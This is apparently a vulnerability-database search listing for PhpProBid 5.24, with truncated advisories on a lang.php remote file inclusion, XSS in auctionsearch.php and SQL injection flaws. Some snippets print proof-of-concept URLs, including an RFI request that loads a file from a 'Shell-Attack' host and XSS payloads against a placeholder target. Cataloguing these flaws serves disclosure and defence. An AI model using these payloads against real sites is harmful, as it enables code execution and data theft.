16 matches found
EUVD-2006-3921
Malware in sbrugna...
EUVD-2007-0755
Malware in sbrugna...
EUVD-2006-3920
Malware in sbrugna...
PHPProbid 5.24 Lang.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22374/info PHPProbid is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlyi...
PHPProbid Lang.PHP远程文件包含漏洞
PHPProbid是一款基于PHP的WEB应用程序。 PHPProbid不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'Lang.PHP'脚本对用户提交的'src'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 PHPProbid 5.24 目前没有解决方案提供: http://www.phpprobid.com/ http://example.com//lang.php?lang=i%20height=1000%20width=1000%2 0src=http://Shell-Attack/...
CVE-2007-0758
Summary : CVE-2007-0758 is a PHP remote file inclusion vulnerability in the lang.php component of PHPProbid 5.24. The flaw allows an attacker to execute arbitrary PHP code by supplying a URL in the SRC attribute of an HTML element within the lang parameter. The affected product is PHPProbid 5.24;...
PHPProbid 5.24 - Lang.php Remote File Inclusion
PHPProbid 5.24 - Lang.php Remote File Inclusion source: https://www.securityfocus.com/bid/22374/info PHPProbid is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application an...
PHPProbid 5.24 - 'Lang.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/22374/info PHPProbid is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also...
CVE-2006-3927
Cross-site scripting XSS vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc parameter...
CVE-2006-3926
Multiple SQL injection vulnerabilities in PhpProBid 5.24 allow remote attackers to execute arbitrary SQL commands via the 1 view or 2 start parameters to a viewfeedback.php or the 3 orderType parameter to b categories.php...
CVE-2006-3927
CVE-2006-3927 is an XSS vulnerability in PhpProBid 5.24, exploitable via the advsrc parameter in auctionsearch.php. The connected records confirm the affected software/version and the vulnerable parameter, but there are no published remediation details in the provided documents. The exploitation ...
CVE-2006-3926
PhpProBid 5.24 is vulnerable to multiple SQL injection flaws that allow remote attackers to execute arbitrary SQL commands by supplying crafted values to viewfeedback.php (view/start parameters) or categories.php (orderType parameter). Root cause: inadequate input validation/sanitization for thes...
CVE-2006-3927
Cross-site scripting XSS vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc parameter...
CVE-2006-3926
Multiple SQL injection vulnerabilities in PhpProBid 5.24 allow remote attackers to execute arbitrary SQL commands via the 1 view or 2 start parameters to a viewfeedback.php or the 3 orderType parameter to b categories.php...
phpprobid524.txt
Phpprobid 5.24 http://www.phpprobid.com -------------------------- Cross Site Scripting XSS -------------------------- http://target.xx/auctionsearch.php?advsrc="alert/EllipsisSecurityTest/ http://target.xx/auctionsearch.php?start=1&advsrc="alert/EllipsisSecurityTest/ ------------- SQL injection...
Phpprobid <= 5.24 XSS SQL injection Vulnerability
Phpprobid 5.24 http://www.phpprobid.com -------------------------- Cross Site Scripting XSS -------------------------- http://target.xx/auctionsearch.php?advsrc="scriptalert/EllipsisSecurityTest//script http://target.xx/auctionsearch.php?start=1&advsrc="scriptalert/EllipsisSecurityTest//script...